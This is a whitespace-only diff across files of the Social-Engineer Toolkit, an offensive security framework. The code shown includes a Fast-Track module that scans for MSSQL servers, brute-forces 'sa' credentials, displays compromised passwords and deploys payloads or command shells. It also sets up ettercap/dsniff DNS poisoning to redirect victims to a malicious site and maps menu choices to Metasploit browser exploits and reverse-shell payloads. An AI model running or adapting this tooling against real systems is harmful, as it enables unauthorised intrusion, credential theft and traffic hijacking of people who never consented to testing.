pause = raw_input(bcolors.BOLD + "\nDon't miss it! Sep 25 - Sep 29th! Press {return} to continue." + bcolors.ENDC)
# load set
if main_menu_choice == '1':
try:
reload(src.core.set)
except:
import src.core.set
# quit out
if main_menu_choice == 'exit' or main_menu_choice == "99" or main_menu_choice == "quit":
exit_set()
# cleans up stale processes from SET
try:
# kill anything python running on 80
kill_proc("80","python")
# kill anything on 443 ruby which is generally a rogue listener
kill_proc("443", "ruby")
except: pass
# load fasttrack
if main_menu_choice == '2':
try: reload(src.core.fasttrack)
except: import src.core.fasttrack
# third party modules
if main_menu_choice == '3':
try: reload(src.core.module_handler)
except: import src.core.module_handler
# load set
if main_menu_choice == '1':
try:
reload(src.core.set)
except:
import src.core.set
# update metasploit
if main_menu_choice == '4':
update_metasploit()
# load fasttrack
if main_menu_choice == '2':
try: reload(src.core.fasttrack)
except: import src.core.fasttrack
# update set
if main_menu_choice == '5':
update_set()
# third party modules
if main_menu_choice == '3':
try: reload(src.core.module_handler)
except: import src.core.module_handler
# credits
if main_menu_choice == '6':
update_config()
# update config
if main_menu_choice == '7':
help_menu()
# update metasploit
if main_menu_choice == '4':
update_metasploit()
# update set
if main_menu_choice == '5':
update_set()
# credits
if main_menu_choice == '6':
update_config()
# update config
if main_menu_choice == '7':
help_menu()
# handle keyboard interrupts
except KeyboardInterrupt:
print "\n\nThank you for " + bcolors.RED+"shopping" + bcolors.ENDC+" with the Social-Engineer Toolkit.\n\nHack the Gibson...and remember...hugs are worth more than handshakes.\n"
print "\n\nThank you for " + bcolors.RED+"shopping" + bcolors.ENDC+" with the Social-Engineer Toolkit.\n\nHack the Gibson...and remember...hugs are worth more than handshakes.\n"
# handle exceptions
except Exception, error:
log(error)
print "\n\n[!] Something went wrong, printing the error: "+ str(error)
log(error)
print "\n\n[!] Something went wrong, printing the error: "+ str(error)
# cleanup routine
cleanup_routine()


@ -13,89 +13,89 @@ import re
try: import pexpect
# if pexpect fails
except ImportError:
print "\n[*] PEXPECT is required, please download and install before running this..."
print "[*] Exiting SET-AUTOMATE mode..."
sys.exit()
print "\n[*] PEXPECT is required, please download and install before running this..."
print "[*] Exiting SET-AUTOMATE mode..."
sys.exit()
# try to define filename through argument specified during command line mode
try:
filename=sys.argv[1]
filename=sys.argv[1]
# if we through an exception spit out the command line syntax
except IndexError:
print "\nThe Social-Engineer Toolkit Automate - Automatation for SET"
print "\nSimply create a file that has each option you want from menu mode."
print "For example your file should look something like this:"
print "\n2\n2\n2\nhttps://gmail.com\n2\n2\n443\netc.\n"
print "Usage: ./set-automate <filename>"
sys.exit()
print "\nThe Social-Engineer Toolkit Automate - Automatation for SET"
print "\nSimply create a file that has each option you want from menu mode."
print "For example your file should look something like this:"
print "\n2\n2\n2\nhttps://gmail.com\n2\n2\n443\netc.\n"
print "Usage: ./set-automate <filename>"
sys.exit()
# if the filename doesnt exist throw an error
if not os.path.isfile(filename):
print "\n[*] Sorry hoss, unable to locate that filename, try again.\n"
sys.exit()
if not os.path.isfile(filename):
print "\n[*] Sorry hoss, unable to locate that filename, try again.\n"
sys.exit()
password="false"
# if the path is around
if os.path.isfile(filename):
try:
print "[*] Spawning SET in a threaded process..."
child=pexpect.spawn("python set")
#child.delaybeforesend = 0
fileopen=file(filename,"r")
for line in fileopen:
line=line.rstrip()
# if we just use enter send default
if line == "": line="default"
try:
print "[*] Spawning SET in a threaded process..."
child=pexpect.spawn("python set")
#child.delaybeforesend = 0
fileopen=file(filename,"r")
for line in fileopen:
line=line.rstrip()
# if we just use enter send default
if line == "": line="default"
match1=re.search("OMGPASSWORDHERE", line)
if match1:
line=line.replace(" OMGPASSWORDHERE", "")
password="true"
match1=re.search("OMGPASSWORDHERE", line)
if match1:
line=line.replace(" OMGPASSWORDHERE", "")
password="true"
if password == "false":
print "[*] Sending command %s to the interface..." % (line)
if password == "true":
print "[*] Sending command [**********] (password masked) to the interface..."
password="false"
if password == "false":
print "[*] Sending command %s to the interface..." % (line)
if password == "true":
print "[*] Sending command [**********] (password masked) to the interface..."
password="false"
if line == "default":
line=""
if line == "default":
line=""
if line == "CONTROL-C-HERE":
try:
print "[*] This may take a few seconds while SET catches up..."
child.expect("Next line of the body:")
time.sleep(2)
child.sendline("\n")
child.sendcontrol('c')
if line == "CONTROL-C-HERE":
try:
print "[*] This may take a few seconds while SET catches up..."
child.expect("Next line of the body:")
time.sleep(2)
child.sendline("\n")
child.sendcontrol('c')
# if the user is using pexpect < 2.3
except AttributeError:
print "[-] Error: You are running pexpect < 2.3 which is needed for this function"
choice=raw_input("Would you like to install it now yes or no: ")
if choice == "yes" or choice == "y":
subprocess.Popen("wget http://sourceforge.net/projects/pexpect/files/pexpect/Release%202.3/pexpect-2.3.tar.gz;tar -zxvf pexpect-2.3.tar.gz;cd pexpect-2.3;python setup.py install;cd ..;rm -rf pexpect-2*", shell=True).wait()
try:
reload(pexpect)
child.sendcontrol('c')
except:
print "[*] Relaunch the Social-Engineer Toolkit for changes to apply."
sys.exit()
if line != "CONTROL-C-HERE":
child.sendline(line)
# if the user is using pexpect < 2.3
except AttributeError:
print "[-] Error: You are running pexpect < 2.3 which is needed for this function"
choice=raw_input("Would you like to install it now yes or no: ")
if choice == "yes" or choice == "y":
subprocess.Popen("wget http://sourceforge.net/projects/pexpect/files/pexpect/Release%202.3/pexpect-2.3.tar.gz;tar -zxvf pexpect-2.3.tar.gz;cd pexpect-2.3;python setup.py install;cd ..;rm -rf pexpect-2*", shell=True).wait()
try:
reload(pexpect)
child.sendcontrol('c')
except:
print "[*] Relaunch the Social-Engineer Toolkit for changes to apply."
sys.exit()
if line != "CONTROL-C-HERE":
child.sendline(line)
print "[*] Finished sending commands, interacting with the interface.."
child.interact()
print "[*] Finished sending commands, interacting with the interface.."
child.interact()
# sometimes pexpect can throw errors upon exit this handles them
except OSError:
sys.exit()
# sometimes pexpect can throw errors upon exit this handles them
except OSError:
sys.exit()
# handle keyboardinterrupts (controlc)
except KeyboardInterrupt:
print "[*] Control-C detected, exiting the Social-Engineer Toolkit.."
sys.exit()
# handle keyboardinterrupts (controlc)
except KeyboardInterrupt:
print "[*] Control-C detected, exiting the Social-Engineer Toolkit.."
sys.exit()
# handle everything else
except Exception,e: print "[*] Something went wrong, printing error: %s" % str(e)
# handle everything else
except Exception,e: print "[*] Something went wrong, printing error: %s" % str(e)


@ -16,52 +16,52 @@ operating_system = check_os()
# if windows then do some stuff
if operating_system == "posix":
definepath = os.getcwd()
definepath = os.getcwd()
print "\n[*] Welcome to the SET-Proxy Configuration Utility"
print "\nEnter the proxy setting informatiom below.\n\nExample: http://10.3.1.1:8080\n"
print "\n[*] Welcome to the SET-Proxy Configuration Utility"
print "\nEnter the proxy setting informatiom below.\n\nExample: http://10.3.1.1:8080\n"
try:
try:
proxy = raw_input("Enter the proxy server: ")
username = raw_input("Enter the username for the proxy (hit enter for none): ")
password = getpass.getpass("Enter the password for the proxy (hit enter for none): ")
proxy = raw_input("Enter the proxy server: ")
username = raw_input("Enter the username for the proxy (hit enter for none): ")
password = getpass.getpass("Enter the password for the proxy (hit enter for none): ")
except KeyboardInterrupt:
print "\n[!] Exiting the Social-Engineer Toolkit."
sys.exit()
except KeyboardInterrupt:
print "\n[!] Exiting the Social-Engineer Toolkit."
sys.exit()
if username != "":
proxy_string = "export http_proxy='http://%s:%s@%s'" % (username,password,proxy)
if username != "":
proxy_string = "export http_proxy='http://%s:%s@%s'" % (username,password,proxy)
if username == "":
proxy_string = "export http_proxy='http://%s'" % (proxy)
if username == "":
proxy_string = "export http_proxy='http://%s'" % (proxy)
filewrite = file("src/program_junk/proxy.config", "w")
filewrite.write(proxy_string)
filewrite.close()
filewrite = file("src/program_junk/proxy.config", "w")
filewrite.write(proxy_string)
filewrite.close()
from src.core.set import *
from src.core.set import *
def kill_proc(port,flag):
proc=subprocess.Popen("netstat -antp | grep '%s'" % (port), shell=True, stdout=subprocess.PIPE)
stdout_value=proc.communicate()[0]
a=re.search("\d+/%s" % (flag), stdout_value)
if a:
b=a.group()
b=b.replace("/%s" % (flag),"")
subprocess.Popen("kill -9 %s 1> /dev/null 2> /dev/null" % (b), shell=True).wait()
def kill_proc(port,flag):
proc=subprocess.Popen("netstat -antp | grep '%s'" % (port), shell=True, stdout=subprocess.PIPE)
stdout_value=proc.communicate()[0]
a=re.search("\d+/%s" % (flag), stdout_value)
if a:
b=a.group()
b=b.replace("/%s" % (flag),"")
subprocess.Popen("kill -9 %s 1> /dev/null 2> /dev/null" % (b), shell=True).wait()
# cleans up stale processes from SET
try:
# kill anything python running on 80
kill_proc("80","python")
# kill anything on 443 ruby which is generally a rogue listener
kill_proc("443", "ruby")
# cleans up stale processes from SET
try:
# kill anything python running on 80
kill_proc("80","python")
# kill anything on 443 ruby which is generally a rogue listener
kill_proc("443", "ruby")
# handle errors
except Exception, error:
log(error)
pass
# handle errors
except Exception, error:
log(error)
pass
else:
print "[!] Sorry, this only works on posix (nix) based systems and is not compatible with this operating system."
print "[!] Sorry, this only works on posix (nix) based systems and is not compatible with this operating system."


@ -16,4 +16,3 @@ except KeyboardInterrupt:
# handle all other errors
except Exception, e: print "\n[!] Something went wrong.. Printing the error: " + e

16
set-web

@ -1,19 +1,19 @@
#!/usr/bin/env python
import sys,socket
try:
# import the web interface
from src.commandcenter.command_center import *
# import the web interface
from src.commandcenter.command_center import *
# except socket errors
except socket.error:
print "[*] Something is already running on the SET web port, please exit it and then restart.\n\n"
print "[*] Something is already running on the SET web port, please exit it and then restart.\n\n"
# except os errors
except OSError:
pass
pass
# except the rest
except:
print "[*] Exiting the Social-Engineer Toolkit Command-Center"
print "[*] Thank you for shopping at the Social-Engineer Toolkit\n"
pass
except:
print "[*] Exiting the Social-Engineer Toolkit Command-Center"
print "[*] Thank you for shopping at the Social-Engineer Toolkit\n"
pass


@ -20,15 +20,15 @@ if platform.system() == "Linux":
# if index is out of range then flag options
except IndexError:
print "** SET Dependancy Installer v0.2 **"
print "\nTo install: setup.py install"
print "\nTo install: setup.py install"
# if user specified install then lets to the installation
if installer == True:
# if we trigger on sources.list then we know its ubuntu
if os.path.isfile("/etc/apt/sources.list"):
# force install of debian packages
# force install of debian packages
subprocess.Popen("apt-get --force-yes -y install build-essential python-pexpect python-beautifulsoup python-pefile python-crypto python-openssl python-pymssql", shell=True).wait()
# if sources.list is not available then we're running something offset
@ -38,9 +38,9 @@ if platform.system() == "Linux":
sys.exit()
if platform.system() =='Darwin':
subprocess.Popen("easy_install pexpect beautifulsoup pycrypto pyopenssl pefile pymssql beautifulsoup", shell=True).wait()
print "[!] Note that you will need to install XCODE for OSX and run 'sudo easy_install cython pymssql' to finish."
subprocess.Popen("easy_install pexpect beautifulsoup pycrypto pyopenssl pefile pymssql beautifulsoup", shell=True).wait()
print "[!] Note that you will need to install XCODE for OSX and run 'sudo easy_install cython pymssql' to finish."
if platform.system != "Linux":
if platform.system != "Darwin":
print "[!] Sorry this installer is not designed for any other system other than Linux and Mac. Please install the python depends manually."
if platform.system != "Darwin":
print "[!] Sorry this installer is not designed for any other system other than Linux and Mac. Please install the python depends manually."


@ -34,9 +34,9 @@ filewrite = file("autorun/autorun.inf", "w")
# if we are using shellcodeexec
alpha_data = ""
if os.path.isfile("src/program_junk/meterpreter.alpha"):
fileopen = file("src/program_junk/meterpreter.alpha", "r")
alpha_data = fileopen.read().rstrip()
fileopen = file("src/program_junk/meterpreter.alpha", "r")
alpha_data = fileopen.read().rstrip()
# if using standard payloads
if trigger == 1:



@ -24,7 +24,7 @@ for line in fileopen:
# strip any garbage trailing characters
line=line.rstrip()
# grab anything without comments on it
if line[0:1] != "#":
if line[0:1] != "#":
line=line.split("=")
html_form(line[0],line[1])
counter=counter+1


@ -16,14 +16,14 @@ definepath=os.getcwd()
config=file("config/set_config", "r").readlines()
# grab our default directory
cwd=os.getcwd()
# set a variable as default to n or no
# set a variable as default to n or no
ettercapchoice= 'n'
# add dsniffchoice
dsniffchoice = 'n'
for line in config:
# check for ettercap choice here
match1=re.search("ETTERCAP=ON",line)
if match1:
if match1:
setcore.print_info("ARP Cache Poisoning is set to " + setcore.bcolors.GREEN + "ON" + setcore.bcolors.ENDC)
ettercapchoice='y'
@ -52,8 +52,8 @@ for line in fileopen:
line=line.rstrip()
path=line.replace("ETTERCAP_PATH=", "")
if not os.path.isfile(path):
path = ("/usr/local/share/ettercap")
if not os.path.isfile(path):
path = ("/usr/local/share/ettercap")
# if we are using ettercap then get everything ready
if ettercapchoice== 'y':
@ -73,7 +73,7 @@ if ettercapchoice== 'y':
will want to trigger the DNS redirect on. A simple example of this is if you
wanted to trigger everyone on your subnet to connect to you when they go to
browse to www.google.com, the victim would then be redirected to your malicious
site. You can alternatively poison everyone and everysite by using the wildcard
site. You can alternatively poison everyone and everysite by using the wildcard
'*' flag.
IF YOU WANT TO POISON ALL DNS ENTRIES (DEFAULT) JUST HIT ENTER OR *
@ -83,7 +83,7 @@ if ettercapchoice== 'y':
os.chdir(path)
# small fix for default
if dns_spoof == "":
# set default to * (everything)
# set default to * (everything)
dns_spoof="*"
# remove old stale files
subprocess.Popen("rm etter.dns 1> /dev/null 2> /dev/null", shell=True).wait()
@ -112,10 +112,10 @@ if ettercapchoice== 'y':
filewrite.close()
os.chdir(cwd)
except Exception, error:
os.chdir(cwd)
os.chdir(cwd)
#log(error)
setcore.print_error("ERROR:An error has occured:")
print "ERROR:" +str(error)
print "ERROR:" +str(error)
# if we are using dsniff
if dsniffchoice == 'y':
@ -135,7 +135,7 @@ if dsniffchoice == 'y':
will want to trigger the DNS redirect on. A simple example of this is if you
wanted to trigger everyone on your subnet to connect to you when they go to
browse to www.google.com, the victim would then be redirected to your malicious
site. You can alternatively poison everyone and everysite by using the wildcard
site. You can alternatively poison everyone and everysite by using the wildcard
'*' flag.
IF YOU WANT TO POISON ALL DNS ENTRIES (DEFAULT) JUST HIT ENTER OR *
@ -167,10 +167,8 @@ if dsniffchoice == 'y':
# this is needed to keep it similar to format above for web gui mode
pause=raw_input("Press <return> to begin dsniff.")
except Exception, error:
os.chdir(cwd)
os.chdir(cwd)
#log(error)
# print error message
setcore.print_error("ERROR:An error has occurred:")
print setcore.bcolors.RED + "ERROR" + str(error) + setcore.bcolors.ENDC


@ -1,14 +1,14 @@
#!/usr/bin/env python
""" Python lists used for quick conversion of user input
to strings used by the toolkit
to strings used by the toolkit
"""
def encoder_type(encode):
"""
"""
Takes the value sent from the user encoding menu and returns
the actual value to be used.
the actual value to be used.
"""
return {
@ -34,15 +34,15 @@ def encoder_type(encode):
def ms_module(exploit):
""" Receives the input given by the user from gen_payload.py """
return {
'1':"exploit/multi/browser/java_jre17_jmxbean_2",
'2':"exploit/multi/browser/java_jre17_jmxbean",
'3':"exploit/windows/browser/ie_cbutton_uaf",
'4':"exploit/multi/browser/java_jre17_exec",
'5':"exploit/windows/browser/ie_execcommand_uaf",
'1':"exploit/multi/browser/java_jre17_jmxbean_2",
'2':"exploit/multi/browser/java_jre17_jmxbean",
'3':"exploit/windows/browser/ie_cbutton_uaf",
'4':"exploit/multi/browser/java_jre17_exec",
'5':"exploit/windows/browser/ie_execcommand_uaf",
'6':"exploit/multi/browser/java_atomicreferencearray",
'7':"exploit/multi/browser/java_verifier_field_access",
'7':"exploit/multi/browser/java_verifier_field_access",
'8':"exploit/windows/browser/ms12_037_same_id",
'9':"exploit/windows/browser/msxml_get_definition_code_exec",
'10':"exploit/windows/browser/adobe_flash_rtmp",
@ -75,17 +75,17 @@ def ms_module(exploit):
'37':"windows/browser/mozilla_mchannel",
'38':"auxiliary/server/browser_autopwn",
}.get(exploit,"ERROR")
# called from gen_payload.py
# uses payload_menu_2
def ms_payload(payload):
"""
Receives the input given by the user from create_payload.py
and create_payloads.py
Receives the input given by the user from create_payload.py
and create_payloads.py
"""
return {
'1':"windows/shell_reverse_tcp",
'2':"windows/meterpreter/reverse_tcp",
@ -99,12 +99,12 @@ def ms_payload(payload):
'10':"windows/meterpreter/reverse_tcp_dns",
'11':"windows/download_exec",
}.get(payload,"ERROR")
# called from create_payloads.py
def ms_payload_2(payload):
""" Receives the input given by the user from create_payloadS.py """
return {
'1':"windows/shell_reverse_tcp",
'2':"windows/meterpreter/reverse_tcp",
@ -120,13 +120,13 @@ def ms_payload_2(payload):
'12':"set/reverse_shell",
'13':"set/reverse_shell",
'14':"shellcode/alphanum",
'15':"shellcode/pyinject",
'16':"shellcode/multipyinject",
'15':"shellcode/pyinject",
'16':"shellcode/multipyinject",
}.get(payload,"ERROR")
def ms_payload_3(payload):
""" Receives the input given by the user from create_payloadS.py """
return {
'1':"windows/shell_reverse_tcp",
'2':"windows/meterpreter/reverse_tcp",
@ -141,7 +141,7 @@ def ms_payload_3(payload):
# uses create_payloads_menu
def ms_attacks(exploit):
""" Receives the input given by the user from create_payload.py """
return {
'1':"dll_hijacking",
'2':"unc_embed",
@ -164,7 +164,7 @@ def ms_attacks(exploit):
'19':"exploit/windows/fileformat/adobe_reader_u3d",
'20':"exploit/windows/fileformat/ms12_027_mscomctl_bof",
}.get(exploit,"INVALID")
def teensy_config(choice):
""" Receives the input given by the user from set.py """
@ -176,10 +176,10 @@ def teensy_config(choice):
'5':"java_applet.pde",
'6':"gnome_wget.pde"
}.get(choice,"ERROR")
def webattack_vector(attack_vector):
""" Receives the input given by the user from set.py """
return {
'1':"java",
'2':"browser",
@ -189,12 +189,12 @@ def webattack_vector(attack_vector):
'6':"webjacking",
'7':"multiattack"
}.get(attack_vector,"ERROR")
def category(category):
"""
"""
Takes the value sent from the user encoding menu and returns
the actual value to be used.
the actual value to be used.
"""
@ -229,7 +229,6 @@ def category(category):
'27':"set",
'28':"teensy2powershell",
'29':"powershell",
'30':"delldrac",
'31':"ridenum"
'30':"delldrac",
'31':"ridenum"
}.get(category,"ERROR")


@ -6,14 +6,14 @@ import subprocess
definepath = os.getcwd()
try:
import _mssql
import _mssql
except ImportError:
print_error("PYMSSQL is not installed. MSSQL attacks will not work!")
operating_system = check_os()
if operating_system == "windows":
print_status("You can download PYMSSQL executables from here: http://www.lfd.uci.edu/~gohlke/pythonlibs/")
raw_input("Press {return} to continue.")
pass
print_error("PYMSSQL is not installed. MSSQL attacks will not work!")
operating_system = check_os()
if operating_system == "windows":
print_status("You can download PYMSSQL executables from here: http://www.lfd.uci.edu/~gohlke/pythonlibs/")
raw_input("Press {return} to continue.")
pass
#
#
# Fast-Track Main options and interface menus
@ -21,329 +21,329 @@ except ImportError:
#
check_mssql()
try:
while 1:
###################################################
# USER INPUT: SHOW WEB ATTACK MENU #
###################################################
while 1:
###################################################
# USER INPUT: SHOW WEB ATTACK MENU #
###################################################
create_menu(text.fasttrack_text, text.fasttrack_menu)
attack_vector = raw_input(setprompt(["19"], ""))
create_menu(text.fasttrack_text, text.fasttrack_menu)
attack_vector = raw_input(setprompt(["19"], ""))
if attack_vector == "99" or attack_vector == "quit" or attack_vector == "exit":
break
if attack_vector == "99" or attack_vector == "quit" or attack_vector == "exit":
break
##################################
##################################
# mssql_scanner
##################################
##################################
if attack_vector == "1":
# start the menu
create_menu(text.fasttrack_mssql_text1, text.fasttrack_mssql_menu1)
# take input here
attack_vector_sql = raw_input(setprompt(["19","21"], ""))
##################################
##################################
# mssql_scanner
##################################
##################################
if attack_vector == "1":
# start the menu
create_menu(text.fasttrack_mssql_text1, text.fasttrack_mssql_menu1)
# take input here
attack_vector_sql = raw_input(setprompt(["19","21"], ""))
#
# option 1 scan and attack, option 2 connect directly to mssql
# if 1, start scan and attack
#
if attack_vector_sql == '1':
print "\nHere you can select either a CIDR notation/IP Address or a filename\nthat contains a list of IP Addresses.\n\nFormat for a file would be similar to this:\n\n192.168.13.25\n192.168.13.26\n192.168.13.26\n\n1. Scan IP address or CIDR\n2. Import file that contains SQL Server IP addresses\n"
choice = raw_input(setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
# grab ip address
range = raw_input(setprompt(["19","21","22"], "Enter the CIDR, single IP, or filename with IP addresses (ex. 192.168.1.1/24 or filename.txt)"))
# grab the port
port = raw_input(setprompt(["19","21","22"], "Enter the port number to scan [1433]"))
# if default use 1433
if port == "": port = 1433
# ask for a wordlist
wordlist = raw_input(setprompt(["19","21","22"], "Enter path to a wordlist file [use default wordlist]"))
if wordlist == "": wordlist = "default"
# specify the user to brute force
username = raw_input(setprompt(["19","21","22"], "Enter the username to brute force or specify username file (/root/users.txt) [sa]"))
# default to sa
if username == "": username = "sa"
if username != "sa":
if not os.path.isfile(username):
print_status("If you were using a file, its not found, using text as username.")
# import the mssql module from fasttrack
from src.fasttrack import mssql
# choice from earlier if we want to use a filelist or whatnot
if choice != "2":
# sql_servers
sql_servers = mssql.scan(range, port, port)
# specify choice 2
if choice == "2":
if not os.path.isfile(range):
while 1:
print_warning("Sorry boss. The file was not found. Try again")
range = raw_input(setprompt(["19","21", "22"], "Enter the CIDR, single, IP, or file with IP addresses (ex. 192.168.1.1/24)"))
if os.path.isfile(range):
print_status("Atta boy. Found the file this time. Moving on.")
break
fileopen = file(range, "r").readlines()
sql_servers = ""
for line in fileopen:
line=line.rstrip()
sql_servers = sql_servers + line + ","
# this will hold all of the SQL servers eventually
master_list = ""
# set a base counter
counter = 0
# if we specified a username list
if os.path.isfile(username):
usernames = file(username, "r")
if sql_servers != False:
# get rid of extra data from port scanner
sql_servers = sql_servers.replace(":%s OPEN" % (port), "")
# split into tuple for different IP address
sql_servers = sql_servers.split(",")
# start loop and brute force
for servers in sql_servers:
#
# option 1 scan and attack, option 2 connect directly to mssql
# if 1, start scan and attack
#
if attack_vector_sql == '1':
print "\nHere you can select either a CIDR notation/IP Address or a filename\nthat contains a list of IP Addresses.\n\nFormat for a file would be similar to this:\n\n192.168.13.25\n192.168.13.26\n192.168.13.26\n\n1. Scan IP address or CIDR\n2. Import file that contains SQL Server IP addresses\n"
choice = raw_input(setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
# grab ip address
range = raw_input(setprompt(["19","21","22"], "Enter the CIDR, single IP, or filename with IP addresses (ex. 192.168.1.1/24 or filename.txt)"))
# grab the port
port = raw_input(setprompt(["19","21","22"], "Enter the port number to scan [1433]"))
# if default use 1433
if port == "": port = 1433
# ask for a wordlist
wordlist = raw_input(setprompt(["19","21","22"], "Enter path to a wordlist file [use default wordlist]"))
if wordlist == "": wordlist = "default"
# specify the user to brute force
username = raw_input(setprompt(["19","21","22"], "Enter the username to brute force or specify username file (/root/users.txt) [sa]"))
# default to sa
if username == "": username = "sa"
if username != "sa":
if not os.path.isfile(username):
print_status("If you were using a file, its not found, using text as username.")
# import the mssql module from fasttrack
from src.fasttrack import mssql
# choice from earlier if we want to use a filelist or whatnot
if choice != "2":
# sql_servers
sql_servers = mssql.scan(range, port, port)
# specify choice 2
if choice == "2":
if not os.path.isfile(range):
while 1:
print_warning("Sorry boss. The file was not found. Try again")
range = raw_input(setprompt(["19","21", "22"], "Enter the CIDR, single, IP, or file with IP addresses (ex. 192.168.1.1/24)"))
if os.path.isfile(range):
print_status("Atta boy. Found the file this time. Moving on.")
break
fileopen = file(range, "r").readlines()
sql_servers = ""
for line in fileopen:
line=line.rstrip()
sql_servers = sql_servers + line + ","
# this will return the following format ipaddr + "," + username + "," + str(port) + "," + passwords
if servers != "":
# if we aren't using a username file
if not os.path.isfile(username):
sql_success = mssql.brute(servers, username, port, wordlist)
if sql_success != False:
# after each success or fail it will break into this to the above with a newline to be parsed later
master_list = master_list + sql_success + ":"
counter = 1
# this will hold all of the SQL servers eventually
master_list = ""
# set a base counter
counter = 0
# if we specified a username list
if os.path.isfile(username):
usernames = file(username, "r")
# if we specified a username list
if os.path.isfile(username):
for users in usernames:
users = users.rstrip()
sql_success = mssql.brute(servers, users, port, wordlist)
# we wont break out of the loop here incase theres multiple usernames we want to find
if sql_success != False:
master_list = master_list + sql_success + ":"
counter = 1
if sql_servers != False:
# get rid of extra data from port scanner
sql_servers = sql_servers.replace(":%s OPEN" % (port), "")
# split into tuple for different IP address
sql_servers = sql_servers.split(",")
# start loop and brute force
for servers in sql_servers:
# if we didn't successful attack one
if counter == 0:
print_warning("Sorry. Unable to locate or fully compromise a MSSQL Server.")
pause = raw_input("Press {return} to continue to the main menu.")
# if we successfully attacked one
if counter == 1:
# need to loop to keep menu going
while 1:
# set a counter to show compromised servers
counter = 1
# here we list the servers we compromised
master_names = master_list.split(":")
print_status("Select the compromise SQL server you want to interact with:\n")
for success in master_names:
if success != "":
success = success.rstrip()
success=success.split(",")
success= bcolors.BOLD + success[0] + bcolors.ENDC + " username: " + bcolors.BOLD + "%s" % (success[1]) + bcolors.ENDC + " | password: " + bcolors.BOLD + "%s" % (success[3]) + bcolors.ENDC
print " " + str(counter) + ". " + success
# increment counter
counter = counter + 1
# this will return the following format ipaddr + "," + username + "," + str(port) + "," + passwords
if servers != "":
# if we aren't using a username file
if not os.path.isfile(username):
sql_success = mssql.brute(servers, username, port, wordlist)
if sql_success != False:
# after each success or fail it will break into this to the above with a newline to be parsed later
master_list = master_list + sql_success + ":"
counter = 1
print "\n 99. Return back to the main menu.\n"
# select the server to interact with
select_server = raw_input(setprompt(["19","21","22"], "Select the SQL server to interact with [1]"))
# default 1
if select_server == "quit" or select_server == "exit": break
if select_server == "": select_server = "1"
if select_server == "99": break
counter = 1
for success in master_names:
if success != "":
success = success.rstrip()
success = success.split(",")
# if we equal the number used above
if counter == int(select_server):
# ipaddr + "," + username + "," + str(port) + "," + passwords
print "\nHow do you want to deploy the binary via debug (win2k, winxp, win2003) or powershell (vista,win7)\n\n 1. Windows Powershell\n 2. Windows Debug Conversion\n 3. Standard Windows Shell\n\n 99. Return back to the main menu.\n"
option = raw_input(setprompt(["19","21","22"], "Which deployment option do you want [1]"))
if option == "": option = "2"
# if 99 then break
if option == "99": break
# specify we are using the fasttrack option, this disables some features
filewrite = file("src/program_junk/fasttrack.options", "w")
filewrite.write("none")
filewrite.close()
# import fasttrack
if option == "1" or option == "2":
# import payloads for selection and prep
try: reload(src.core.payloadgen.create_payloads)
except: import src.core.payloadgen.create_payloads
mssql.deploy_hex2binary(success[0], success[2], success[1], success[3], option)
# straight up connect
if option == "3":
mssql.cmdshell(success[0], success[2], success[1], success[3], option)
# increment counter
counter = counter + 1
#
# if we want to connect directly to a SQL server
#
if attack_vector_sql == "2":
sql_server = raw_input(setprompt(["19","21","23"], "Enter the hostname or IP address of the SQL server"))
sql_port = raw_input(setprompt(["19","21","23"], "Enter the SQL port to connect [1433]"))
if sql_port == "": sql_port = "1433"
sql_username = raw_input(setprompt(["19","21","23"], "Enter the username of the SQL Server [sa]"))
# default to sa
if sql_username == "": sql_username = "sa"
sql_password = raw_input(setprompt(["19","21","23"], "Enter the password for the SQL server"))
print_status("Connecting to the SQL server...")
# try connecting
# establish base counter for connection
counter = 0
try:
conn = _mssql.connect(sql_server + ":" + str(sql_port), sql_username, sql_password)
# if we specified a username list
if os.path.isfile(username):
for users in usernames:
users = users.rstrip()
sql_success = mssql.brute(servers, users, port, wordlist)
# we wont break out of the loop here incase theres multiple usernames we want to find
if sql_success != False:
master_list = master_list + sql_success + ":"
counter = 1
except Exception, e:
print e
print_error("Connection to SQL Server failed. Try again.")
# if we had a successful connection
if counter == 1:
print_status("Dropping into a SQL shell. Type quit to exit.")
# loop forever
while 1:
# enter the sql command
sql_shell = raw_input("Enter your SQL command here: ")
if sql_shell == "quit" or sql_shell == "exit":
print_status("Exiting the SQL shell and returning to menu.")
break
try:
# execute the query
sql_query = conn.execute_query(sql_shell)
# return results
print "\n"
for data in conn:
data = str(data)
data = data.replace("\\n\\t", "\n")
data = data.replace("\\n", "\n")
data = data.replace("{0: '", "")
data = data.replace("'}", "")
print data
except Exception, e:
print_warning("\nIncorrect syntax somewhere. Printing error message: " + str(e))
# if we didn't successful attack one
if counter == 0:
print_warning("Sorry. Unable to locate or fully compromise a MSSQL Server.")
pause = raw_input("Press {return} to continue to the main menu.")
# if we successfully attacked one
if counter == 1:
# need to loop to keep menu going
while 1:
# set a counter to show compromised servers
counter = 1
# here we list the servers we compromised
master_names = master_list.split(":")
print_status("Select the compromise SQL server you want to interact with:\n")
for success in master_names:
if success != "":
success = success.rstrip()
success=success.split(",")
success= bcolors.BOLD + success[0] + bcolors.ENDC + " username: " + bcolors.BOLD + "%s" % (success[1]) + bcolors.ENDC + " | password: " + bcolors.BOLD + "%s" % (success[3]) + bcolors.ENDC
print " " + str(counter) + ". " + success
# increment counter
counter = counter + 1
print "\n 99. Return back to the main menu.\n"
# select the server to interact with
select_server = raw_input(setprompt(["19","21","22"], "Select the SQL server to interact with [1]"))
# default 1
if select_server == "quit" or select_server == "exit": break
if select_server == "": select_server = "1"
if select_server == "99": break
counter = 1
for success in master_names:
if success != "":
success = success.rstrip()
success = success.split(",")
# if we equal the number used above
if counter == int(select_server):
# ipaddr + "," + username + "," + str(port) + "," + passwords
print "\nHow do you want to deploy the binary via debug (win2k, winxp, win2003) or powershell (vista,win7)\n\n 1. Windows Powershell\n 2. Windows Debug Conversion\n 3. Standard Windows Shell\n\n 99. Return back to the main menu.\n"
option = raw_input(setprompt(["19","21","22"], "Which deployment option do you want [1]"))
if option == "": option = "2"
# if 99 then break
if option == "99": break
# specify we are using the fasttrack option, this disables some features
filewrite = file("src/program_junk/fasttrack.options", "w")
filewrite.write("none")
filewrite.close()
# import fasttrack
if option == "1" or option == "2":
# import payloads for selection and prep
try: reload(src.core.payloadgen.create_payloads)
except: import src.core.payloadgen.create_payloads
mssql.deploy_hex2binary(success[0], success[2], success[1], success[3], option)
# straight up connect
if option == "3":
mssql.cmdshell(success[0], success[2], success[1], success[3], option)
# increment counter
counter = counter + 1
#
# if we want to connect directly to a SQL server
#
